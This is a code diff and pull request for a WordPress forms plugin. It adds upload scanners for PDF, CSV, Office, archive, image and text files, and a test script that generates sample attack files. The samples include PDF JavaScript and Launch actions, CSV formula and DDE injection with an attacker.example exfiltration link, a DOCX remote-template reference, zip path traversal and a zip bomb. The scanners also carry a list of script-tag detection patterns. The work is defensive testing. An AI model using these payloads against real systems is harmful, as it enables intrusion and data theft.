-		return \is_string($output) && $output !== '' ? $output : null;
+		return $exitCode === 0 && $output !== '' ? $output : null;
 	}
 }

--- a/src/Validation/FileSecurity/TextScanner.php
+++ b/src/Validation/FileSecurity/TextScanner.php
@@ -1,0 +1,62 @@
+<?php
+
+/**
+ * Plain-text security scanner. Rejects .txt uploads that contain server-side
+ * script tags — a strong signal someone is trying to smuggle PHP/ASP/JSP
+ * through a "plain text" allow-list.
+ *
+ * @package EightshiftForms\Validation\FileSecurity
+ */
+
+declare(strict_types=1);
+
+namespace EightshiftForms\Validation\FileSecurity;
+
+/**
+ * Scans .txt uploads.
+ */
+final class TextScanner implements FileSecurityScannerInterface
+{
+	/**
+	 * Case-insensitive substrings that should never appear in a legitimate
+	 * plain-text upload.
+	 *
+	 * @var array<int, string>
+	 */
+	private const SCRIPT_PATTERNS = [
+		'<?php',
+		'<?=',
+		'<%@ page',
+		'<%@page',
+		'<jsp:',
+		'#!/bin/sh',
+		'#!/bin/bash',
+	];
+
+	/**
+	 * Scan a single file.
+	 *
+	 * @param string $filepath     Absolute path to the file on disk.
+	 * @param string $declaredName Original (user-supplied) filename, used to derive the extension.
+	 * @param string $detectedMime Magic-byte MIME type detected from the file contents.
+	 *
+	 * @return string Empty string when the file is considered safe;
+	 *                otherwise the label key (from Labels) describing the rejection reason.
+	 */
+	public function scan(string $filepath, string $declaredName, string $detectedMime): string
+	{
+		$contents = @\file_get_contents($filepath); // phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged, WordPress.WP.AlternativeFunctions.file_get_contents_file_get_contents
+		if (!\is_string($contents)) {
+			return 'validationFileScanFailed';
+		}
+
+		$lower = \strtolower($contents);
+		foreach (self::SCRIPT_PATTERNS as $pattern) {
+			if (\strpos($lower, $pattern) !== false) {
+				return 'validationFileTextUnsafe';
+			}
+		}
+
+		return '';
+	}
+}

--- a/src/Validation/FileSecurity/TextScanner.php
+++ b/src/Validation/FileSecurity/TextScanner.php
@@ -50,9 +50,8 @@ final class TextScanner implements FileSecurityScannerInterface
 			return 'validationFileScanFailed';
 		}
 
-		$lower = \strtolower($contents);
 		foreach (self::SCRIPT_PATTERNS as $pattern) {
-			if (\strpos($lower, $pattern) !== false) {
+			if (\stripos($contents, $pattern) !== false) {
 				return 'validationFileTextUnsafe';
 			}
 		}

--- a/src/Validation/SettingsValidation.php
+++ b/src/Validation/SettingsValidation.php
@@ -18,6 +18,7 @@ use EightshiftForms\Helpers\GeneralHelpers;
 use EightshiftForms\Helpers\SettingsOutputHelpers;
 use EightshiftForms\Settings\SettingInterface;
 use EightshiftForms\Settings\SettingGlobalInterface;
+use EightshiftForms\Validation\FileSecurity\FileSecurityDiagnostics;
 use EightshiftFormsVendor\EightshiftLibs\Services\ServiceInterface;
 
 /**
@@ -242,6 +243,8 @@ class SettingsValidation implements SettingGlobalInterface, SettingInterface, Se
 			$messagesOutput[] = $output;
 		}
 
+		$missingExtensions = FileSecurityDiagnostics::getMissingExtensions();
+
 		return [
 			SettingsOutputHelpers::getIntro(self::SETTINGS_TYPE_KEY),
 			[
@@ -287,6 +290,41 @@ class SettingsValidation implements SettingGlobalInterface, SettingInterface, Se
 									%2\$s
 									</ul>", 'eightshift-forms'), 'https://regex101.com/', $validationPatterns)),
 								'textareaValue' => SettingsHelpers::getOptionValueAsJson(self::SETTINGS_VALIDATION_PATTERNS_KEY, 3),
+							],
+						],
+					],
+					[
+						'component' => 'tab',
+						'tabLabel' => \__('File security', 'eightshift-forms'),
+						'tabContent' => [
+							[
+								'component' => 'intro',
+								'introTitle' => \__('File upload security stack', 'eightshift-forms'),
+							],
+							[
+								'component' => 'card-inline',
+								'cardInlineTitle' => \__('QPDF binary', 'eightshift-forms'),
+								'cardInlineSubTitle' => FileSecurityDiagnostics::getQpdfBinary()
+									? \__('Configured and executable. Full PDF scanning is active.', 'eightshift-forms')
+									: \__('Not found or not executable. PDF scanning is limited to raw-byte checks, which are less reliable.', 'eightshift-forms'),
+							],
+							[
+								'component' => 'card-inline',
+								'cardInlineTitle' => \__('proc_open()', 'eightshift-forms'),
+								'cardInlineSubTitle' => FileSecurityDiagnostics::isProcOpenAvailable()
+									? \__('Enabled. qpdf can be invoked when its binary path is wired.', 'eightshift-forms')
+									: \__('Disabled in php.ini. qpdf integration cannot run; raw-byte PDF scan still works.', 'eightshift-forms'),
+							],
+							[
+								'component' => 'card-inline',
+								'cardInlineTitle' => \__('PHP extensions', 'eightshift-forms'),
+								'cardInlineSubTitle' => empty($missingExtensions)
+									? \__('All required PHP extensions are loaded (fileinfo, zip, dom, gd or imagick).', 'eightshift-forms')
+									: \sprintf(
+										// translators: %s is a comma-separated list of missing PHP extension names.
+										\__('Missing required PHP extensions: %s.', 'eightshift-forms'),
+										'<code>' . \esc_html(\implode(', ', $missingExtensions)) . '</code>'
+									),
 							],
 						],
 					],

--- a/src/Validation/Validator.php
+++ b/src/Validation/Validator.php
@@ -17,6 +17,7 @@ use EightshiftForms\Helpers\UploadHelpers;
 use EightshiftForms\Labels\LabelsInterface;
 use EightshiftForms\Helpers\SettingsHelpers;
 use EightshiftForms\Config\Config;
+use EightshiftForms\Validation\FileSecurity\FileSecurityScanner;
 use EightshiftFormsVendor\EightshiftLibs\Helpers\Helpers;
 
 /**
@@ -30,6 +31,13 @@ class Validator extends AbstractValidation
 	 * @var LabelsInterface
 	 */
 	protected $labels;
+
+	/**
+	 * File security scanner.
+	 *
+	 * @var FileSecurityScanner
+	 */
+	protected FileSecurityScanner $fileSecurityScanner;
 
 	/**
 	 * Validation Fields to check.
@@ -78,11 +86,13 @@ class Validator extends AbstractValidation
 	/**
 	 * Create a new instance.
 	 *
-	 * @param LabelsInterface $labels Inject documentsData which holds labels data.
+	 * @param LabelsInterface     $labels              Inject documentsData which holds labels data.
+	 * @param FileSecurityScanner $fileSecurityScanner Inject the file security scanner.
 	 */
-	public function __construct(LabelsInterface $labels)
+	public function __construct(LabelsInterface $labels, FileSecurityScanner $fileSecurityScanner)
 	{
 		$this->labels = $labels;
+		$this->fileSecurityScanner = $fileSecurityScanner;
 	}
 
 	/**
@@ -372,6 +382,17 @@ class Validator extends AbstractValidation
 						$output[$id] = \sprintf($this->labels->getLabel('validationMaxSize', $formId), $dataValue / 1000);
 					}
 					break;
+			}
+		}
+
+		// Unconditional security scan — runs regardless of whether the field
+		// has an `accept` configured. This is the gate that closes the
+		// "public form with no allow-list = no validation" hole.
+		$tmpName = $file['tmp_name'] ?? '';
+		if (!isset($output[$id]) && \is_string($tmpName) && $tmpName !== '') {
+			$scanError = $this->fileSecurityScanner->scan($tmpName, (string) $fileName);
+			if ($scanError !== '') {
+				$output[$id] = $this->labels->getLabel($scanError, $formId);
 			}
 		}
 

--- a/src/Validation/Validator.php
+++ b/src/Validation/Validator.php
@@ -390,7 +390,10 @@ class Validator extends AbstractValidation
 		// "public form with no allow-list = no validation" hole.
 		$tmpName = $file['tmp_name'] ?? '';
 		if (!isset($output[$id]) && \is_string($tmpName) && $tmpName !== '') {
-			$scanError = $this->fileSecurityScanner->scan($tmpName, (string) $fileName);
+			$extraMimes = ($formDetails[Config::FD_TYPE] ?? '') === Config::FILE_UPLOAD_ADMIN_TYPE_NAME
+				? Config::FILE_UPLOAD_ADMIN_EXTRA_MIMES
+				: [];
+			$scanError = $this->fileSecurityScanner->scan($tmpName, (string) $fileName, $extraMimes);
 			if ($scanError !== '') {
 				$output[$id] = $this->labels->getLabel($scanError, $formId);
 			}

--- a/tests/security/generate-test-files.sh
+++ b/tests/security/generate-test-files.sh
@@ -1,0 +1,201 @@
+#!/usr/bin/env bash
+#
+# Generates harmless test files that exercise each scanner in
+# src/Validation/FileSecurity/. Run once, then upload each file via a
+# public Eightshift Forms file field and verify the matching rejection.
+#
+# Usage:  ./generate-test-files.sh [output_dir]
+#         defaults to ./test-files
+
+set -euo pipefail
+
+OUT="${1:-test-files}"
+mkdir -p "$OUT"
+cd "$OUT"
+
+echo "Generating into: $(pwd)"
+
+# ---------------------------------------------------------------------------
+# 1. Extension deny-list (rejected before any content scan).
+# Expected label: validationFileExtensionDenied
+# ---------------------------------------------------------------------------
+echo "harmless content"                       > deny-shell.exe
+echo "<?php echo 'not real'; ?>"              > deny-script.php
+echo "fake batch"                             > deny-batch.bat
+# SVG is in the default deny-list too, so this never reaches the SVG scanner.
+echo '<svg><script>alert(1)</script></svg>'   > deny-evil.svg
+
+# ---------------------------------------------------------------------------
+# 2. MIME mismatch — .pdf extension but JPEG magic bytes.
+# Expected label: validationFileMimeMismatch
+# ---------------------------------------------------------------------------
+printf '\xFF\xD8\xFF\xE0\x00\x10JFIF\x00\x01\x01\x01' > mime-mismatch.pdf
+
+# ---------------------------------------------------------------------------
+# 3. PDF — uncompressed dangerous key (JavaScript autoload).
+# Expected label: validationFilePdfUnsafe
+# ---------------------------------------------------------------------------
+cat > pdf-javascript.pdf <<'EOF'
+%PDF-1.4
+1 0 obj << /Type /Catalog /OpenAction << /S /JavaScript /JS (app.alert('test')) >> >> endobj
+xref
+0 1
+0000000000 65535 f
+trailer << /Root 1 0 R >>
+%%EOF
+EOF
+
+# PDF with /Launch action (executes external app on open).
+cat > pdf-launch.pdf <<'EOF'
+%PDF-1.4
+1 0 obj << /Type /Action /S /Launch /F (cmd.exe) >> endobj
+xref
+0 1
+0000000000 65535 f
+trailer << /Root 1 0 R >>
+%%EOF
+EOF
+
+# PDF with /EmbeddedFile (file smuggling).
+cat > pdf-embedded.pdf <<'EOF'
+%PDF-1.4
+1 0 obj << /Type /Filespec /EmbeddedFile 2 0 R >> endobj
+xref
+0 1
+0000000000 65535 f
+trailer << /Root 1 0 R >>
+%%EOF
+EOF
+
+# ---------------------------------------------------------------------------
+# 4. CSV — spreadsheet formula injection.
+# Expected label: validationFileCsvUnsafe
+# ---------------------------------------------------------------------------
+cat > csv-formula.csv <<'EOF'
+name,note
+Alice,=cmd|'/c calc.exe'!A1
+Bob,=HYPERLINK("http://attacker.example/log?u="&A1,"Click me")
+Carol,@DDE(cmd,/c calc.exe,!)
+EOF
+
+# ---------------------------------------------------------------------------
+# 5. ZIP — contains a deny-listed executable.
+# Expected label: validationFileArchiveUnsafe
+# ---------------------------------------------------------------------------
+TMP_EXE=$(mktemp -d)/payload.exe
+printf 'MZ\x90\x00fake-executable' > "$TMP_EXE"
+zip -q archive-with-exe.zip "$TMP_EXE"
+rm -rf "$(dirname "$TMP_EXE")"
+
+# ---------------------------------------------------------------------------
+# 6. ZIP — path traversal in member name.
+# Expected label: validationFileArchiveUnsafe
+# ---------------------------------------------------------------------------
+python3 - <<'PY'
+import zipfile
+with zipfile.ZipFile('archive-traversal.zip', 'w') as z:
+    z.writestr('../../etc/passwd', 'fake:x:0:0::/root:/bin/sh')
+PY
+
+# ---------------------------------------------------------------------------
+# 7. ZIP — bomb (compression ratio > 100).
+# Expected label: validationFileArchiveUnsafe
+# ---------------------------------------------------------------------------
+python3 - <<'PY'
+import zipfile
+data = b'A' * (10 * 1024 * 1024)  # 10 MB of 'A' compresses to a few KB.
+with zipfile.ZipFile('archive-bomb.zip', 'w', zipfile.ZIP_DEFLATED) as z:
+    z.writestr('bomb.txt', data)
+PY
+
+# ---------------------------------------------------------------------------
+# 8. DOCX — macro-bearing (vbaProject.bin entry).
+# Expected label: validationFileOfficeUnsafe
+# ---------------------------------------------------------------------------
+python3 - <<'PY'
+import zipfile
+with zipfile.ZipFile('office-with-macro.docx', 'w') as z:
+    z.writestr('[Content_Types].xml',
+        '<?xml version="1.0"?>'
+        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
+    z.writestr('word/document.xml',
+        '<?xml version="1.0"?><document>hi</document>')
+    z.writestr('word/vbaProject.bin', b'fake-macro-bytes')
+PY
+
+# DOCX with external-target relationship (template / DDE injection vector).
+python3 - <<'PY'
+import zipfile
+rels = (
+    '<?xml version="1.0"?>'
+    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
+    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
+    'Target="http://attacker.example/payload.dotm" TargetMode="External"/>'
+    '</Relationships>'
+)
+with zipfile.ZipFile('office-external-rel.docx', 'w') as z:
+    z.writestr('[Content_Types].xml',
+        '<?xml version="1.0"?>'
+        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
+    z.writestr('word/_rels/document.xml.rels', rels)
+PY
+
+# ---------------------------------------------------------------------------
+# 9. TXT — smuggled PHP open tag.
+# Expected label: validationFileTextUnsafe
+# ---------------------------------------------------------------------------
+cat > text-php.txt <<'EOF'
+This looks like an innocent text file.
+<?php echo 'should never reach disk'; ?>
+EOF
+
+# TXT — shell script shebang.
+cat > text-shebang.txt <<'EOF'
+#!/bin/bash
+echo "this is not a text file"
+EOF
+
+# ---------------------------------------------------------------------------
+# 10. JPEG — truncated / unparseable.
+# Expected label: validationFileImageUnsafe
+# ---------------------------------------------------------------------------
+# Valid magic bytes but no real image data → getimagesize() returns false.
+printf '\xFF\xD8\xFF\xE0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00' > image-broken.jpg
+
+# ---------------------------------------------------------------------------
+# 11. EICAR — standard non-malicious AV test signature. Only triggers when
+# the es_forms_validation_file_security_external_scanner filter is wired
+# to ClamAV. The structural scanners ignore it.
+# Expected label (when ClamAV is wired): validationFileAntivirus
+# ---------------------------------------------------------------------------
+printf 'X5O!P%%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' > eicar.txt
+
+# ---------------------------------------------------------------------------
+# 12. CLEAN baseline — should pass every layer.
+# Expected: upload succeeds.
+# ---------------------------------------------------------------------------
+cat > clean.txt <<'EOF'
+Plain text, nothing interesting, used as a sanity check.
+EOF
+
+# Minimal valid one-page PDF with no dangerous keys.
+cat > clean.pdf <<'EOF'
+%PDF-1.4
+1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
+2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
+3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
+xref
+0 4
+0000000000 65535 f
+0000000009 00000 n
+0000000053 00000 n
+0000000100 00000 n
+trailer << /Size 4 /Root 1 0 R >>
+startxref
+160
+%%EOF
+EOF
+
+echo
+echo "Done. Files generated in: $(pwd)"
+ls -la


### PR DESCRIPTION
# Description

### Added

- Added a file upload security scanner stack covering archive, CSV, image, Office, PDF, and text files. Scanners run on every upload regardless of the field's `accept` configuration, closing the gap where a field with no allow-list received no content validation.
- Added a "File security" settings tab under Validation that reports the availability of `qpdf`, `proc_open()`, and the required PHP extensions (`fileinfo`, `zip`, `dom`, `gd`/`imagick`).
- Added `fileSecurityDenyExtensions` filter to extend or override the built-in deny list of executable, scriptable, and server-interpreted extensions.
- Added `fileSecurityPdfUseQpdf` and `fileSecurityPdfQpdfBinary` filters to toggle and configure the QPDF integration used for deep PDF inspection.
- Added validation labels for each scanner outcome: `validationFileExtensionDenied`, `validationFileMimeMismatch`, `validationFileScanFailed`, `validationFilePdfUnsafe`, `validationFileImageUnsafe`, `validationFileOfficeUnsafe`, `validationFileCsvUnsafe`, `validationFileArchiveUnsafe`, `validationFileTextUnsafe`.
- Added `errorFileUploadFailedSecurityScan` upload error so the scanner runs again immediately before a file leaves PHP's managed tmp area.
- Added `tests/security/generate-test-files.sh` for generating malicious sample files used to verify scanner behavior.

### Changed

- `AbstractValidation::isMimeTypeValid()` now detects MIME from file contents via libmagic (`finfo`), falling back to `mime_content_type`. The client-supplied `$file['type']` is no longer trusted.
- Bumped version to 9.5.0 in `eightshift-forms.php` and `package.json`.

### Removed

- Removed the `forceMimetypeFromFs` filter. MIME type is now always determined from file contents, so the filter is no longer needed.

## QA Guide

Steps for QA to test this feature:

1. Open **Forms → Settings → Validation** and check that the new **File security** tab appears, showing the status of `qpdf`, `proc_open()`, and the required PHP extensions.
2. On a form with a file upload field that has **no `accept` configured**, try uploading an executable (`.exe`, `.sh`, `.php`, `.bat`). Each should be rejected with "This file type is not allowed."
3. Upload a file whose extension does not match its bytes (e.g. rename `script.php` to `image.jpg`). It should be rejected with "The file contents do not match its extension."
4. Generate test artifacts via `bash tests/security/generate-test-files.sh` and upload the malicious samples:
   - PDF with `/JS` or `/OpenAction` → rejected as unsafe PDF.
   - Image with embedded script/EXIF anomalies → rejected as unsafe image.
   - Office file with macros (`.docm`, `.xlsm`) → rejected as unsafe document.
   - CSV starting with `=`, `+`, `-`, `@` → rejected as unsafe CSV.
   - ZIP with a denylisted entry or extreme compression ratio → rejected as unsafe archive.
   - Plain text containing `<script>` → rejected as unsafe text.
5. Upload a clean, normal file of each supported type (PDF, JPG, DOCX, CSV, ZIP, TXT) and confirm submission succeeds.
6. Verify the scanner runs **twice**: once during validation and once again inside `UploadHelpers::uploadFile` just before the file moves into `esforms-tmp` (the second pass guards against callers that skip validation).

**Expected result:** Every malicious sample is rejected with the appropriate validation label; every clean file submits normally. The File security tab accurately reflects the server environment.

# Screenshots / Videos

<!-- Add screenshots or screen recordings showing the changes in action. -->

# Linked documentation PR

<!-- If this PR has documentation please put the link here. -->